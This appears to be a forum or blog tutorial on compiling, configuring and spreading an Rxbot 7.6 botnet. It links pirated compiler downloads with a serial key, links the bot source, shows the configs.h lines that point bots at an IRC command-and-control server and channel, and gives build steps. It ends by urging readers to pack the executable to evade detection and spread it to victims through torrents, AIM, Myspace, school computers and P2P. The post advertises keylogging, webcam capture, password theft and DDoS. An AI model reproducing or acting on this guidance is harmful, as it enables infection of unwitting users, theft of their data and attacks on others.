>

How to compile, use, and secure Botnets

A botnet can be used to keylog computers, capture screen shots, turn on webcam and take pictures, get cdkeys, get passwords, perform DDoS attacks, run commands, open sites, basically anything Smile I wrote this botnet tutorial.

Here we go ladies and gentlemen Smile
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Mcft Visual C++ 6.0 Standard Edition
Code:
http://anonym.to/?http://www.megaupload.com/?d=SUHPYZRX


Mirror 2
Code:
http://anonym.to/?http://rapidshare.com/files/21861555/msc__.rar.html


Mirror 3
Code:
http://www.0daymedia.net/p/files/id/274


Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install Service Pack 6
Code:
http://anonym.to/?http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en


4. After that Download and install the Windows Platform SDK:

Code:
http://anonym.to/?http://www.megaupload.com/?d=YH3SS78I


Mirror 2:
Code:
http://anonym.to/?http://rapidshare.com/files/21854411/sdk.rar.html


Mirror 3:
Code:
http://www.0daymedia.net/p/files/id/266


Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Mcft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:
C:\PROGRAM FILES\Mcft PLATFORM SDK
C:\PROGRAM FILES\Mcft PLATFORM SDK\BIN
C:\PROGRAM FILES\Mcft PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB


4. Now put them in this order: (use up and down arrows)

(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack: This botsource:
Code:
http://anonym.to/?http://www.mediafire.com/?awmwyidzjz5


Mirror 2:
Code:
http://anonym.to/?http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html


Mirror 3:
Code:
http://www.0daymedia.net/p/files/id/265



2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:


Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass


-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Mcft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

0 comments:

Post a Comment